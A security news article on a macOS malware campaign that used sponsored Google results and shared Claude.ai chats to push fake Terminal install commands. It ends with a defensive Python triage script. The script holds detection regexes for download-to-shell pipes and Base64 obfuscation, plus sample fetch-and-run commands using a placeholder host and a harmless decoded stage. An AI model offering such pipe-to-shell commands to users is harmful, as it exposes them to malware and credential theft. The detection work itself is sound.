Cybercriminals are using Google Ads and publicly shared Claude AI chats to trick macOS users into infecting their devices with malware disguised as legitimate installation instructions.
The campaign targets users searching Google for terms such as “Claude mac download.” Victims are shown sponsored search results that appear to lead to the legitimate Claude AI platform but instead redirect users to malicious installation pages.

Researchers found that attackers abused publicly accessible Claude.ai shared chats to host fake setup instructions masquerading as official guidance from “Apple Support.” The malicious chats instruct users to open Terminal and paste commands that silently download and execute malware on macOS systems.

Security researcher Berk Albayrak first identified the operation and warned that multiple malicious Claude chats were being used simultaneously with different infrastructure and payloads.

The attack relies heavily on trust manipulation. Instead of directing victims to obviously fake phishing domains, attackers abuse legitimate services and trusted platforms to make the malicious instructions appear authentic. Researchers say this significantly increases the likelihood that technically savvy users will follow the instructions without suspicion.

AdGuard researchers previously documented similar campaigns involving malicious user-generated pages hosted directly on the Claude.ai domain. Attackers created fake installation guides containing hidden commands designed to download malware from attacker-controlled servers. Because the pages existed on a legitimate Claude.ai subdomain, many users mistakenly assumed the content was officially endorsed.

The malicious commands often use obfuscated or Base64-encoded shell scripts to hide their true behavior. Once executed, the payload can download additional malware, establish persistence, steal credentials, and give attackers remote access to infected systems.

Earlier investigations by Bitdefender and Sophos linked related campaigns to malware families including MacSync, Beagle, DonutLoader, and PlugX-associated backdoors. Some variants targeted developers and security professionals specifically, aiming to steal browser credentials, SSH keys, cryptocurrency wallets, GitHub tokens, and enterprise access credentials.

Researchers say the campaign is particularly dangerous because it blends naturally into common developer workflows. Users searching for AI coding tools or package managers already expect to run terminal commands as part of installation processes, making malicious instructions less suspicious than traditional phishing techniques.

The abuse of Google Ads has also become a major concern. Attackers purchase sponsored search results using trusted keywords, allowing malicious links to appear above legitimate search results. In several documented cases, the ads displayed authentic-looking Claude.ai URLs even though the linked content was attacker-controlled user-generated material.

Researchers warn that macOS users should avoid blindly copying terminal commands from AI chats, forums, or search results, even when the pages appear to belong to trusted domains. Security experts also recommend carefully inspecting sponsored links and avoiding installation instructions that use encoded or heavily obfuscated shell commands.
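The article describes two recognisable traits of these fake installation steps: a download piped straight into a shell, and a Base64-encoded stage that hides what actually runs. The script below is an added example written for this page, not tooling from Albayrak, AdGuard, Bitdefender or Sophos. It triages a pasted command before anyone runs it by flagging those traits and decoding any Base64 fragment so the hidden stage can be read in the clear. The regex rules and the three sample commands are constructed for illustration; the "hidden" stage in the sample is a harmless `echo`.

```python
import base64
import binascii
import re

# Constructed heuristics (an assumption of this example, not the researchers'
# detection logic) for the traits the article calls out: download-to-shell
# pipes, Base64 decoding in the chain, and eval/escape obfuscation.
RISK_PATTERNS = [
    (r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b",
     "download piped directly into a shell"),
    (r"\bbase64\s+(-d|--decode|-D)\b",
     "Base64 decoding in the command chain"),
    (r"\bbase64\s+(-d|--decode|-D)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b",
     "decoded data piped into a shell"),
    (r"\beval\b|\$\(\s*printf\b|\\x[0-9a-fA-F]{2}",
     "eval or escape-sequence obfuscation"),
    (r"\bsudo\b", "requests administrator privileges"),
]

# Anything that looks like a Base64 run of 16+ characters is worth decoding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def assess_command(cmd: str) -> list[str]:
    """Return the risk labels that match `cmd`, in rule order, without duplicates."""
    findings = []
    for pattern, label in RISK_PATTERNS:
        if re.search(pattern, cmd) and label not in findings:
            findings.append(label)
    return findings


def decode_base64_fragments(cmd: str) -> list[str]:
    """Decode Base64-looking tokens in `cmd` that turn out to be printable text,
    so a reviewer sees the hidden stage instead of trusting the wrapper."""
    decoded = []
    for match in B64_TOKEN.finditer(cmd):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
            text = raw.decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # not valid Base64, or binary rather than a script
        if text and all(ch.isprintable() or ch.isspace() for ch in text):
            decoded.append(text)
    return decoded


# Constructed sample commands; the encoded stage is deliberately harmless and
# the download host is the reserved .invalid TLD.
SAFE_CMD = "brew install --cask some-app"
HIDDEN_STAGE = "echo 'harmless decoded stage'"
ENCODED_CMD = "echo %s | base64 -d | sh" % base64.b64encode(HIDDEN_STAGE.encode()).decode()
PIPE_CMD = "curl -fsSL https://example.invalid/install.sh | sudo sh"


if __name__ == "__main__":
    for cmd in (SAFE_CMD, ENCODED_CMD, PIPE_CMD):
        print(cmd)
        for label in assess_command(cmd) or ["no risk pattern matched"]:
            print("  -", label)
        for text in decode_base64_fragments(cmd):
            print("  decoded:", text)
```

Run it as a script to see each sample command with its findings and, for the encoded one, the decoded stage. The point of `decode_base64_fragments` is that an encoded command is never safer for being encoded: if the decoded text cannot be read and understood, the instruction should not be run, whatever domain it was found on.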